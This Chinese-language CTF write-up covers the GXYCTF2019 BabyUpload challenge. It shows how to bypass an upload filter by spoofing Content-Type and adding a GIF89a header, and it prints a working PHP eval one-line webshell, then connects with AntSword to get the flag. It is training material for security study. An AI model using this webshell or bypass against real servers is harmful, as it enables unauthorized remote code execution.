[GXYCTF2019]Babyupload
![图片[1]-[GXYCTF2019]BabyUpload – buu刷题笔记-渗透云记 - 专注于网络安全与技术分享](https://b.encenc.com/wp-content/uploads/2022/05/d2b5ca33bd97-81.png)
进入靶机我们可以看到这应该是通过文件上传一句话木马之后连接蚁剑得到flag
首先我们测试一下能上传哪些文件
我先尝试上传了.jpg文件发现显示了这样一句话 不能传.jpg文件???
![图片[2]-[GXYCTF2019]BabyUpload – buu刷题笔记-渗透云记 - 专注于网络安全与技术分享](https://b.encenc.com/wp-content/uploads/2022/05/d2b5ca33bd97-79.png)
按道理来说这不合理,然后我就尝试传了另外一个.jpg文件,发现上传成功了。。。我猜测这应该是对.jpg文件的大小进行了限制。(测试之后,只要图片过小,就会报这个
尝试上传php文件
![图片[3]-[GXYCTF2019]BabyUpload – buu刷题笔记-渗透云记 - 专注于网络安全与技术分享](https://b.encenc.com/wp-content/uploads/2022/05/d2b5ca33bd97-80.png)
这不就限制死了,啥php,php3,php5,phtml等都用不了了,不过还有
这里可以参考
这里就不过多赘述了,只要记得
更改Content-Type: application/octet-stream为Content-Type: image/jpeg就行
上传成功!
然后上传我们的一句话
GIF89a
<script language='php'>@eval($_POST["muhan"]);</script>
这里我们要改两个地方,第一个是将2.phtml改成2.jpg,第二个也是要改成image/jpeg
然后就是蚁剑链接,最后获得flag为flag{250166d4-3923-485d-a19f-00d70170f8a9}
© 版权声明
渗透云记的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
渗透云记拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!
本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!访问本博客请务必遵守有关互联网的相关法律、规定与规则。一旦您访问本博客,即表示您已经知晓并接受了此声明通告。详情见本站的“免责声明”如果有侵权之处请第一时间联系我们删除。敬请谅解!E-mail:admin@encenc.com
THE END















请登录后查看评论内容